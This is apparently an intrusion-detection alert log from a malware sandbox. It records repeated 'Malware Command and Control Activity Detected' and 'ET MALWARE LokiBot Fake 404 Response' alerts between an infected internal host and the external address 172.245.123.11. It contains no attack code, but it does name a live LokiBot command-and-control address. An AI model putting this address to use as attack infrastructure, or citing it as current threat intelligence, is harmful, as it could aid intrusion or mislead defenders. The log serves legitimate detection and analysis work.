2025-01-07T11:01:59.975652+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:00.675299+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.372775+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:02.102743+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.801547+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:03.617744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.247901+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.955089+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:05.693265+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.454475+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:07.167908+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.855998+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:08.543768+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.203966+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.860003+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:10.546688+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.233719+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.958150+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:12.617821+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.258855+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.915720+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:14.575614+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.241631+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.898264+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:16.561248+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.278413+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.961173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:18.640081+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.327075+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:20.043059+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.742103+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.431219+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:22.122622+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.801706+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:23.524470+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.248034+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.981285+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:25.670616+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.424356+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:27.144150+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.947960+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:28.637968+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.308443+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:30.085557+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.768828+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.465790+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:32.162958+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:33.125642+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.779104+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:34.503792+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.152174+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.829436+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.478731+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:37.135567+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.908206+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:38.589708+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.258110+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.972590+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:40.635703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.303821+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.967237+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:42.625053+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.363394+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:44.019633+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.684154+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:45.507465+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.180115+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.851221+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:47.795111+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:48.451009+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.150118+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.806913+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:50.480746+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.210960+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.916359+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:52.618644+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.273172+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.936803+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:55.171759+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.829665+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:56.557892+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.234366+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.904891+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:58.574189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.229112+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.900572+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:00.558517+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.212085+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.900649+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:02.675531+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.337291+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:04.013533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.679878+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.319446+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.975970+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:06.639844+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.327650+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:08.132275+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.806380+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.459976+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:10.132210+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.788630+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.460089+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:12.127099+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.756187+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.399253+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:14.117177+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.771734+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:15.503726+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.146706+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.829444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:17.571531+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.224687+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.881699+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:19.523285+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.196458+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.851457+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.507813+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:22.176021+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:23.213434+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.151005+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.824519+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:26.710640+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.380300+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:28.015736+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.703037+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.349451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:30.026092+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.701445+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.406580+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:32.067627+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.733953+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:33.433270+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:34.782674+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.422766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:36.111250+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.787347+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.443278+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:38.078880+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.720674+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.392736+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:40.062714+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.725262+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.427015+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:42.077854+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.718228+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.373897+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:44.064476+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.703993+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.361356+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:46.021356+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.728055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.390462+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:48.079188+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.750749+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.450939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:50.093929+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.740699+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.391659+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:52.063134+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.739569+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.390870+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:54.062572+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.718933+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.375592+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:56.016359+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.672622+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.344266+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:58.028337+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50151	172.245.123.11	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:59.172328+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49708	TCP
2025-01-07T11:01:59.826461+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49709	TCP
2025-01-07T11:02:00.495096+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49710	TCP
2025-01-07T11:02:01.192750+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49711	TCP
2025-01-07T11:02:01.907960+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49712	TCP
2025-01-07T11:02:02.638895+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49714	TCP
2025-01-07T11:02:03.325869+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49715	TCP
2025-01-07T11:02:04.088778+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49716	TCP
2025-01-07T11:02:04.776954+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49717	TCP
2025-01-07T11:02:05.483351+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49718	TCP
2025-01-07T11:02:06.199216+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49719	TCP
2025-01-07T11:02:06.949892+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49720	TCP
2025-01-07T11:02:07.698697+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49721	TCP
2025-01-07T11:02:08.376604+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49722	TCP
2025-01-07T11:02:09.048487+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49723	TCP
2025-01-07T11:02:09.690347+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49724	TCP
2025-01-07T11:02:10.376291+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49725	TCP
2025-01-07T11:02:11.080304+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49727	TCP
2025-01-07T11:02:11.744334+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49730	TCP
2025-01-07T11:02:12.471383+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49732	TCP
2025-01-07T11:02:13.119052+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49734	TCP
2025-01-07T11:02:13.758672+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49736	TCP
2025-01-07T11:02:14.425478+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49738	TCP
2025-01-07T11:02:15.088894+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49739	TCP
2025-01-07T11:02:15.752303+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49740	TCP
2025-01-07T11:02:16.412071+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49741	TCP
2025-01-07T11:02:17.074803+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49742	TCP
2025-01-07T11:02:17.799464+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49748	TCP
2025-01-07T11:02:18.483475+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49754	TCP
2025-01-07T11:02:19.162697+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49760	TCP
2025-01-07T11:02:19.856728+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49766	TCP
2025-01-07T11:02:20.569615+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49772	TCP
2025-01-07T11:02:21.272044+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49778	TCP
2025-01-07T11:02:21.954458+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49784	TCP
2025-01-07T11:02:22.616022+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49790	TCP
2025-01-07T11:02:23.331357+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49795	TCP
2025-01-07T11:02:24.064050+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49801	TCP
2025-01-07T11:02:24.766691+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49804	TCP
2025-01-07T11:02:25.495830+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49810	TCP
2025-01-07T11:02:26.182034+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49815	TCP
2025-01-07T11:02:26.940462+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49821	TCP
2025-01-07T11:02:27.641073+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49828	TCP
2025-01-07T11:02:28.470446+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49834	TCP
2025-01-07T11:02:29.132414+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49839	TCP
2025-01-07T11:02:29.819607+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49843	TCP
2025-01-07T11:02:30.599583+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49849	TCP
2025-01-07T11:02:31.280966+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49854	TCP
2025-01-07T11:02:31.972261+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49860	TCP
2025-01-07T11:02:32.650889+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49865	TCP
2025-01-07T11:02:33.623252+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49872	TCP
2025-01-07T11:02:34.286606+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49877	TCP
2025-01-07T11:02:35.008395+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49883	TCP
2025-01-07T11:02:35.674272+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49889	TCP
2025-01-07T11:02:36.336073+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49895	TCP
2025-01-07T11:02:36.981365+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49901	TCP
2025-01-07T11:02:37.637059+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49907	TCP
2025-01-07T11:02:38.445345+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49912	TCP
2025-01-07T11:02:39.109905+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49915	TCP
2025-01-07T11:02:39.776713+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49920	TCP
2025-01-07T11:02:40.452674+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49926	TCP
2025-01-07T11:02:41.138836+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49932	TCP
2025-01-07T11:02:41.803936+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49934	TCP
2025-01-07T11:02:42.465580+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49940	TCP
2025-01-07T11:02:43.151462+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49946	TCP
